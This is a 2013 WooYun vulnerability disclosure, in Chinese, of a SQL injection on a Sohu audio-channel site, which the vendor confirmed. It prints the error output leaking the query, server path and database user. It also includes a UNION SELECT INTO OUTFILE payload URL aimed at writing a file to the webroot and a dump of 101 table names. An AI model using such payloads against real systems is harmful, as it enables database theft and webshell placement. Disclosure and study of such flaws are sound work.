当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-025506

漏洞标题:搜狐某频道注入一个

相关厂商:搜狐

漏洞作者: 逆雪寒

提交时间:2013-06-09 10:29

修复时间:2013-07-24 10:29

公开时间:2013-07-24 10:29

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-06-09: 细节已通知厂商并且等待厂商处理中
2013-06-09: 厂商已经确认,细节仅向厂商公开
2013-06-19: 细节向核心白帽子及相关领域专家公开
2013-06-29: 细节向普通白帽子公开
2013-07-09: 细节向实习白帽子公开
2013-07-24: 细节向公众公开

简要描述:

SQL注入~~老问题了。。

详细说明:

找到 http://ting.sohu.com/send/sending_setcookie.php?cpcode=asdf 这个地址
名字似乎是 set cookie ... 习惯问题。。就单了 ' 如下:
Error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''asdf'' and t1.product_name=t2.product_name' at line 1 on /mfs/wwwroot/ting/send/mysql30/class/class.mysql.php line 13 Sql select t1.audio_url,t2.product_name,t1.sub_product_name,t2.product_id,t1.theorder,t1.sub_product_id from t_sub_product t1,t_product t2 where t1.sub_product_id='asdf'' and t1.product_name=t2.product_name
哇 路径爆了~~ SQL似乎也给外部影响了。。一个注入就这样诞生了
上工具吧。。。
最后还试了试 outfile ...
http://ting.sohu.com/send/balance_user.php?userid_comm=d'%20and%20t1.user_id=t2.user_id%20%20%20union%20all%20select%20%22xxddoo%22,2,3%20INTO%20OUTFILE%20%22/mfs/wwwroot/ting/send/nixuehan.html%22--%20'
结果如下:
Error 1045: Access denied for user 'wcms_tsw'@'192.168.%' (using password: YES) on /mfs/wwwroot/ting/send/mysql30/class/class.mysql.php line 13 Sql SELECT t1.thevalue,t1.user_type,t1.thedate from t_user_info t1,t_user t2 where t2.user_name='d' and t1.user_id=t2.user_id union all select "xxddoo",2,3 INTO OUTFILE "/mfs/wwwroot/ting/send/nixuehan.html"-- '' and t1.user_id=t2.user_id
不错~~ 木有 file 权限。。 这个做的挺好。。否则可能拿SHELL了。。

漏洞证明:

Database: tsw
[101 tables]
+----------------------------------+
| customer |
| passport_temp |
| t_adinfo |
| t_android_catagory |
| t_android_channel |
| t_android_channel_log |
| t_android_comm |
| t_android_log |
| t_android_product |
| t_android_sub_product |
| t_android_user_favorite |
| t_audition_currentday_log |
| t_audition_log |
| t_audition_log_log |
| t_audition_log_log_before_201208 |
| t_award_info_for_monthly_user |
| t_baoyue_mobile_online |
| t_baoyue_month_send_info |
| t_blog |
| t_book_folder |
| t_book_folder_info |
| t_card_order_log |
| t_card_type |
| t_card_type_bak |
| t_client_adv |
| t_client_adv_clicklog |
| t_client_adv_showlog |
| t_client_audition_log |
| t_client_channel |
| t_client_channel_catalog |
| t_client_channel_catalog_product |
| t_client_channel_product |
| t_client_feedback |
| t_client_link |
| t_client_parameter |
| t_client_pwd_log |
| t_client_search_log |
| t_client_type |
| t_client_user |
| t_client_user_fancy |
| t_code |
| t_code_200yueka |
| t_code_50yueka_10jika |
| t_corporation |
| t_cpname_month |
| t_date_dimension |
| t_favorite_log |
| t_iphone_audition_log |
| t_iphone_channel |
| t_iphone_login_submit_log |
| t_iphone_logined_info |
| t_iphone_order_create_log |
| t_iphone_order_result_log |
| t_mobile_segment_info |
| t_mt_month_log |
| t_mtry_listen_count |
| t_order_pay_log |
| t_pay_bank |
| t_pay_bank_log |
| t_pay_charge_log |
| t_pay_forbook_process_log |
| t_pay_mobileno_quit |
| t_pay_recharge_log |
| t_pay_rechargemode |
| t_pay_sms_log |
| t_pc_download |
| t_product |
| t_product_adinfo |
| t_product_ding |
| t_product_type |
| t_record_cart_log |
| t_record_prepay_log |
| t_record_prepay_product_info |
| t_rq_top |
| t_sms_content_info |
| t_sms_gwid_oid_info |
| t_stat_login_personcount |
| t_stat_m_month_info |
| t_stat_nlogin_personcount |
| t_stat_product |
| t_stat_search |
| t_stat_stry_listen_count |
| t_stat_ting_income_register_info |
| t_stat_ting_sub_product_info |
| t_stat_trylisten_personcount |
| t_sub_product |
| t_try_listen_count |
| t_tsw_sms_log |
| t_user |
| t_user_info |
| t_user_info_log |
| t_user_info_monthly |
| t_user_product_bind_info |
| t_user_product_info |
| t_user_zhubo_info |
| t_wap_down_log |
| t_wap_log |
| t_wo_folder_info |
| t_zhubo_renwu |
| t_zhubo_zizhi_text |
| t_zhubo_zizhi_upload |
+----------------------------------+

修复方案:

搜狐开发们比我懂

版权声明:转载请注明来源 逆雪寒@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2013-06-09 10:59

厂商回复:

感谢对搜狐安全关注

最新状态:

暂无


漏洞评价:

评论